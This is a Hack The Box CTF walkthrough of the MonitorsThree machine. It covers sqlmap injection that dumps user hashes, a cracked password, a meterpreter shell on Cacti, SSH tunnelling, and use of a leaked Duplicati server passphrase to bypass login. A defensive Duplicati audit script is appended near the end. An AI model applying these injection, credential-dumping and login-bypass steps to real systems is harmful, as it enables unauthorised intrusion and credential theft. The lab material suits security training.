MonitorsThree (htb)

December 21st 2024 | #ctf #hackthebox

Medium-difficulty machine on Hack The Box.

sales@monitorsthree.htb Nicola Johnson Glenn Jones

http://monitorsthree.htb/login.php

whatweb http://monitorsthree.htb 

http://monitorsthree.htb [200 OK] Bootstrap, Country[RESERVED][ZZ], Email[sales@monitorsthree.htb], HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.30], JQuery, Script, Title[MonitorsThree - Networking Solutions], X-UA-Compatible[IE=edge], nginx[1.18.0]

ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt -u http://monitorsthree.htb -H "Host:FUZZ.monitorsthree.htb" -ac

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://monitorsthree.htb
 :: Wordlist         : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/sortedcombined-knock-dnsrecon-fierce-reconng.txt
 :: Header           : Host: FUZZ.monitorsthree.htb
 :: Follow redirects : false
 :: Calibration      : true
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

cacti                   [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 34ms]

The Cacti changelog shows it is version 1.2.26. There is an exploit for this version: https://github.com/thisisveryfunny/CVE-2024-25641-RCE-Automated-Exploit-Cacti-1.2.26. However, it requires authentication.

Metasploit also has modules for Cacti exploitation:

0  exploit/linux/http/cacti_unauthenticated_cmd_injection  2022-12-05  excellent  Yes  Cacti 1.2.22 unauthenticated command injection
exploit/multi/http/cacti_package_import_rce

Need a password first...

sqlmap -r request.sql --dbms=mysql --dbs --level 3

sqlmap -r request.sql --dbms=mysql --dbs -D monitorsthree_db -T users --dump --level 3

https://md5hashing.net/hash/md5/31a181c8372e3afc59dab863430610e8 Password: greencacti2001

Database: monitorsthree_db
Table: users
[4 entries]
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| id | dob        | email                       | name              | salary    | password                         | username  | position              | start_date |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+
| 2  | 1978-04-25 | admin@monitorsthree.htb     | Marcus Higgins    | 320800.00 | 31a181c8372e3afc59dab863430610e8 | admin     | Super User            | 2021-01-12 |
| 5  | 1985-02-15 | mwatson@monitorsthree.htb   | Michael Watson    | 75000.00  | c585d01f2eb3e6e1073e92023088a3dd | mwatson   | Website Administrator | 2021-05-10 |
| 6  | 1990-07-30 | janderson@monitorsthree.htb | Jennifer Anderson | 68000.00  | 1e68b6eb86b45f6d92f8f292428f77ac | janderson | Network Engineer      | 2021-06-20 |
| 7  | 1982-11-23 | dthompson@monitorsthree.htb | David Thompson    | 83000.00  | 633b683cc128fe244b00f176c8a950f5 | dthompson | Database Manager      | 2022-09-15 |
+----+------------+-----------------------------+-------------------+-----------+----------------------------------+-----------+-----------------------+------------+

/etc/mysql/my.cnf

/etc/mono/mconfig/config.xml

meterpreter > shell
Process 39084 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python3 -c 'import pty; pty.spawn("/bin/bash")'               
www-data@monitorsthree:~/html/cacti/resource$ 

MariaDB [cacti]> select * from user_auth;
select * from user_auth;
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name     | email_address            | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G |     0 | Administrator | marcus@monitorsthree.htb |                      |                 | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   436423766 |
|  3 | guest    | $2y$10$SO8woUvjSFMr1CDo8O3cz.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu |     0 | Guest Account | guest@monitorsthree.htb  |                      |                 | on        | on        | on           |                |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |  3774379591 |
|  4 | marcus   | $2y$10$Fq8wGXvlM3Le.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK |     0 | Marcus        | marcus@monitorsthree.htb |                      | on              | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  |        |               0 |        0 |  1677427318 |
+----+----------+--------------------------------------------------------------+-------+---------------+--------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+

ssh -i marcus.key -L 8888:localhost:8200 marcus@10.10.11.30
Last login: Sun Jan 12 12:42:45 2025 from 10.10.14.25
marcus@monitorsthree:~$ 

find / -name "filename" 2>/dev/null

find / -name "duplicati" 2>/dev/null
/opt/duplicati
/etc/cron.d/duplicati

marcus@monitorsthree:/opt/duplicati/config$ ls
control_dir_v2  CTADPNHLTC.sqlite  Duplicati-server.sqlite
sqlite3 Duplicati-server.sqlite .dump

PRAGMA foreign_keys=OFF;
BEGIN TRANSACTION;
CREATE TABLE IF NOT EXISTS "Backup" (
    "ID" INTEGER PRIMARY KEY AUTOINCREMENT,
    "Name" TEXT NOT NULL,
    "Description" TEXT NOT NULL DEFAULT '',
    "Tags" TEXT NOT NULL,
    "TargetURL" TEXT NOT NULL,
    "DBPath" TEXT NOT NULL
);
INSERT INTO Backup VALUES(4,'Cacti 1.2.26 Backup','','','file:///source/opt/backups/cacti/','/config/CTADPNHLTC.sqlite');
CREATE TABLE IF NOT EXISTS "Schedule" (
    "ID" INTEGER PRIMARY KEY,
    "Tags" TEXT NOT NULL,
    "Time" INTEGER NOT NULL,
    "Repeat" TEXT NOT NULL,
    "LastRun" INTEGER NOT NULL,
    "Rule" TEXT NOT NULL
);
INSERT INTO Schedule VALUES(1,'ID=4',1736766000,'1D',1736679600,'AllowedWeekDays=Monday,Tuesday,Wednesday,Thursday,Friday,Saturday,Sunday');
CREATE TABLE IF NOT EXISTS "Source" (
    "BackupID" INTEGER NOT NULL,
    "Path" TEXT NOT NULL
);
INSERT INTO Source VALUES(4,'/source/var/www/html/cacti/');
CREATE TABLE IF NOT EXISTS "Filter" (
    "BackupID" INTEGER NOT NULL,
    "Order" INTEGER NOT NULL,
    "Include" INTEGER NOT NULL,
    "Expression" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "Option" (
    "BackupID" INTEGER NOT NULL,
    "Filter" TEXT NOT NULL,
    "Name" TEXT NOT NULL,
    "Value" TEXT NOT NULL
);
INSERT INTO Option VALUES(4,'','encryption-module','');
INSERT INTO Option VALUES(4,'','compression-module','zip');
INSERT INTO Option VALUES(4,'','dblock-size','50mb');
INSERT INTO Option VALUES(4,'','--no-encryption','true');
INSERT INTO Option VALUES(-1,'','--asynchronous-upload-limit','50');
INSERT INTO Option VALUES(-1,'','--asynchronous-concurrent-upload-limit','50');
INSERT INTO Option VALUES(-2,'','startup-delay','0s');
INSERT INTO Option VALUES(-2,'','max-download-speed','');
INSERT INTO Option VALUES(-2,'','max-upload-speed','');
INSERT INTO Option VALUES(-2,'','thread-priority','');
INSERT INTO Option VALUES(-2,'','last-webserver-port','8200');
INSERT INTO Option VALUES(-2,'','is-first-run','');
INSERT INTO Option VALUES(-2,'','server-port-changed','True');
INSERT INTO Option VALUES(-2,'','server-passphrase','Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=');
INSERT INTO Option VALUES(-2,'','server-passphrase-salt','xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=');
INSERT INTO Option VALUES(-2,'','server-passphrase-trayicon','d66ecdd2-2fd6-47e3-9e94-3e2782095738');
INSERT INTO Option VALUES(-2,'','server-passphrase-trayicon-hash','J6r4mKrRMXXX3fvCQ4BOLZMydxAi/Ca/PFbXAAbY25E=');
INSERT INTO Option VALUES(-2,'','last-update-check','638721870349156060');
INSERT INTO Option VALUES(-2,'','update-check-interval','');
INSERT INTO Option VALUES(-2,'','update-check-latest','');
INSERT INTO Option VALUES(-2,'','unacked-error','False');
INSERT INTO Option VALUES(-2,'','unacked-warning','False');
INSERT INTO Option VALUES(-2,'','server-listen-interface','any');
INSERT INTO Option VALUES(-2,'','server-ssl-certificate','');
INSERT INTO Option VALUES(-2,'','has-fixed-invalid-backup-id','True');
INSERT INTO Option VALUES(-2,'','update-channel','');
INSERT INTO Option VALUES(-2,'','usage-reporter-level','');
INSERT INTO Option VALUES(-2,'','has-asked-for-password-protection','true');
INSERT INTO Option VALUES(-2,'','disable-tray-icon-login','false');
INSERT INTO Option VALUES(-2,'','allowed-hostnames','*');
CREATE TABLE IF NOT EXISTS "Metadata" (
    "BackupID" INTEGER NOT NULL,
    "Name" TEXT NOT NULL,
    "Value" TEXT NOT NULL
);
INSERT INTO Metadata VALUES(4,'LastBackupDate','20250112T110000Z');
INSERT INTO Metadata VALUES(4,'BackupListCount','5');
INSERT INTO Metadata VALUES(4,'TotalQuotaSpace','8350261248');
INSERT INTO Metadata VALUES(4,'FreeQuotaSpace','1647616000');
INSERT INTO Metadata VALUES(4,'AssignedQuotaSpace','-1');
INSERT INTO Metadata VALUES(4,'TargetFilesSize','20586964');
INSERT INTO Metadata VALUES(4,'TargetFilesCount','15');
INSERT INTO Metadata VALUES(4,'TargetSizeString','19.63 MB');
INSERT INTO Metadata VALUES(4,'SourceFilesSize','64904965');
INSERT INTO Metadata VALUES(4,'SourceFilesCount','3883');
INSERT INTO Metadata VALUES(4,'SourceSizeString','61.90 MB');
INSERT INTO Metadata VALUES(4,'LastBackupStarted','20250112T110000Z');
INSERT INTO Metadata VALUES(4,'LastBackupFinished','20250112T110005Z');
INSERT INTO Metadata VALUES(4,'LastBackupDuration','00:00:05.6605300');
INSERT INTO Metadata VALUES(4,'LastErrorDate','20240820T111518Z');
INSERT INTO Metadata VALUES(4,'LastErrorMessage','Found 12 remote files that are not recorded in local storage, please run repair');
INSERT INTO Metadata VALUES(4,'LastCompactDuration','00:00:00.0262700');
INSERT INTO Metadata VALUES(4,'LastCompactStarted','20250112T110005Z');
INSERT INTO Metadata VALUES(4,'LastCompactFinished','20250112T110005Z');
CREATE TABLE IF NOT EXISTS "Log" (
    "BackupID" INTEGER NOT NULL,
    "Description" TEXT NOT NULL,
    "Start" INTEGER NOT NULL,
    "Finish" INTEGER NOT NULL,
    "Result" TEXT NOT NULL,
    "SuggestedIcon" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "ErrorLog" (
    "BackupID" INTEGER,
    "Message" TEXT NOT NULL,
    "Exception" TEXT,
    "Timestamp" INTEGER NOT NULL
);
INSERT INTO ErrorLog VALUES(-1,'Error in updater',replace('System.Net.WebException: Error: NameResolutionFailure\n  at System.Net.WebConnection.Connect (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x00044] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebConnection.InitConnection (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x000cc] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebOperation.Run () [0x0009a] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebCompletionSource`1[T].WaitForCompletion () [0x00094] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.HttpWebRequest.RunWithTimeoutWorker[T] (System.Threading.Tasks.Task`1[TResult] workerTask, System.Int32 timeout, System.Action abort, System.Func`1[TResult] aborted, System.Threading.CancellationTokenSource cts) [0x000f8] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.HttpWebRequest.GetResponse () [0x00016] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.GetWebResponse (System.Net.WebRequest request) [0x00000] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadBits (System.Net.WebRequest request, System.IO.Stream writeStream) [0x000e6] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadFile (System.Uri address, System.String fileName) [0x00088] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadFile (System.String address, System.String fileName) [0x00008] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at (wrapper remoting-invoke-with-check) System.Net.WebClient.DownloadFile(string,string)\n  at Duplicati.Library.AutoUpdater.UpdaterManager.CheckForUpdate (Duplicati.Library.AutoUpdater.ReleaseType channel) [0x000ee] in <a701dea807af493c8cb16ad2fe09f97c>:0 ','\n',char(10)),1736590243);
INSERT INTO ErrorLog VALUES(-1,'Error in updater',replace('System.Net.WebException: Error: NameResolutionFailure\n  at System.Net.WebConnection.Connect (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x00044] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebConnection.InitConnection (System.Net.WebOperation operation, System.Threading.CancellationToken cancellationToken) [0x000cc] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebOperation.Run () [0x0009a] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebCompletionSource`1[T].WaitForCompletion () [0x00094] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.HttpWebRequest.RunWithTimeoutWorker[T] (System.Threading.Tasks.Task`1[TResult] workerTask, System.Int32 timeout, System.Action abort, System.Func`1[TResult] aborted, System.Threading.CancellationTokenSource cts) [0x000f8] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.HttpWebRequest.GetResponse () [0x00016] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.GetWebResponse (System.Net.WebRequest request) [0x00000] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadBits (System.Net.WebRequest request, System.IO.Stream writeStream) [0x000e6] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadFile (System.Uri address, System.String fileName) [0x00088] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at System.Net.WebClient.DownloadFile (System.String address, System.String fileName) [0x00008] in <a8a996a78a804d888710c9e2575d78c8>:0 \n  at (wrapper remoting-invoke-with-check) System.Net.WebClient.DownloadFile(string,string)\n  at Duplicati.Library.AutoUpdater.UpdaterManager.CheckForUpdate (Duplicati.Library.AutoUpdater.ReleaseType channel) [0x000ee] in <a701dea807af493c8cb16ad2fe09f97c>:0 ','\n',char(10)),1736590251);
CREATE TABLE IF NOT EXISTS "Version" (
    "ID" INTEGER PRIMARY KEY,
    "Version" INTEGER NOT NULL
);
INSERT INTO Version VALUES(1,6);
CREATE TABLE IF NOT EXISTS "Notification" (
    "ID" INTEGER PRIMARY KEY,
    "Type" TEXT NOT NULL,
    "Title" TEXT NOT NULL,
    "Message" TEXT NOT NULL, 
    "Exception" TEXT NOT NULL, 
    "BackupID" TEXT NULL,
    "Action" TEXT NOT NULL,
    "Timestamp" INTEGER NOT NULL,
    "LogEntryID" TEXT NULL,
    "MessageID" TEXT NULL,
    "MessageLogTag" TEXT NULL
);
CREATE TABLE IF NOT EXISTS "UIStorage" (
    "Scheme" TEXT NOT NULL, 
    "Key" TEXT NOT NULL, 
    "Value" TEXT NOT NULL
);
CREATE TABLE IF NOT EXISTS "TempFile" (
    "ID" INTEGER PRIMARY KEY,
    "Origin" TEXT NOT NULL, 
    "Path" TEXT NOT NULL, 
    "Timestamp" INTEGER NOT NULL,
    "Expires" INTEGER NOT NULL
);
DELETE FROM sqlite_sequence;
INSERT INTO sqlite_sequence VALUES('Backup',15);
COMMIT;

Bypassing the Duplicati login with the server passphrase: https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee
This is also discussed on the Duplicati GitHub: https://github.com/duplicati/duplicati/issues/5197

python3 duplicati-login.py 'Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=' http://localhost:8888/login.cgi
nonce: f6I/TVqOkPh99AUu6ByUR10GFGcn72u2styqdWGPe2g=
salt: xTfykWV1dATpFZvPhClEJLJzYA5A4L74hX7FK8XmY0I=
hash: Wb6e855L3sN9LTaCuwPXuautswTIQbekmMAr7BrK2Ho=
<Cookie xsrf-token=0EkGO1g%2BF2TCl9wQLBU2ogkBM78EpH1Tdq5AbQa5uTA%3D for localhost.local/>
<Cookie session-nonce=f6I%2FTVqOkPh99AUu6ByUR10GFGcn72u2styqdWGPe2g%3D for localhost.local/>
<Cookie session-auth=X8dwUzo4_h89iqDWUoc_tOOSkAp2dlk-mKS30LswI0o for localhost.local/>
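
A defender-side check for the Duplicati configuration shown in the dump above, added here as an example (not code from this write-up or from the Duplicati project): it reads the "Option" table and the file mode of Duplicati-server.sqlite and reports exposure-relevant settings, including a stored server-passphrase that accounts other than the owner can read. The function names, the finding wording and the placeholder passphrase value are assumptions of this example.

```python
import os
import sqlite3
import stat
import tempfile
from pathlib import Path

# Option names are those visible in the dump above; the risk wording is this example's.
CHECKS = [
    ("server-listen-interface", lambda v: v == "any", "web UI bound to every interface"),
    ("allowed-hostnames", lambda v: v == "*", "any Host header accepted"),
    ("--no-encryption", lambda v: v.lower() == "true", "backup volumes stored unencrypted"),
]

def audit(db_path):
    """Return (scope, item, reason) findings for a Duplicati-server.sqlite file."""
    con = sqlite3.connect(Path(db_path).resolve().as_uri() + "?mode=ro", uri=True)
    try:
        rows = con.execute('SELECT "BackupID", "Name", "Value" FROM "Option"').fetchall()
    finally:
        con.close()
    findings = []
    for backup_id, name, value in rows:
        # In the dump, rows with a negative BackupID are not tied to one backup job.
        scope = "global" if backup_id < 0 else f"backup {backup_id}"
        for opt, is_risky, reason in CHECKS:
            if name == opt and is_risky(value):
                findings.append((scope, name, reason))
    # The linked write-up logs in with the stored server-passphrase alone, so the
    # file holding it should be readable only by the service account.
    mode = stat.S_IMODE(os.stat(db_path).st_mode)
    has_verifier = any(n == "server-passphrase" and v for _, n, v in rows)
    if has_verifier and mode & (stat.S_IRGRP | stat.S_IROTH):
        findings.append(("file", oct(mode), "login verifier readable beyond the owner"))
    return findings

def build_sample(path, mode=0o644):
    """Constructed sample: a few Option rows shaped like the dump, placeholder secret."""
    con = sqlite3.connect(path)
    con.execute('CREATE TABLE "Option" ("BackupID" INTEGER, "Filter" TEXT, "Name" TEXT, "Value" TEXT)')
    con.executemany('INSERT INTO "Option" VALUES (?, ?, ?, ?)', [
        (4, "", "--no-encryption", "true"),
        (-2, "", "server-passphrase", "PLACEHOLDER-HASH"),
        (-2, "", "server-listen-interface", "any"),
        (-2, "", "allowed-hostnames", "*"),
    ])
    con.commit()
    con.close()
    os.chmod(path, mode)
    return path

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as d:
        for finding in audit(build_sample(os.path.join(d, "Duplicati-server.sqlite"))):
            print(finding)
```

Run `audit()` against a copy of the real database rather than the live file, and treat any "file" finding as equivalent to a leaked web UI password.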

Tutorial for setting up intercept in Burp: https://www.matthewsetter.com/introduction-to-burp-suite/

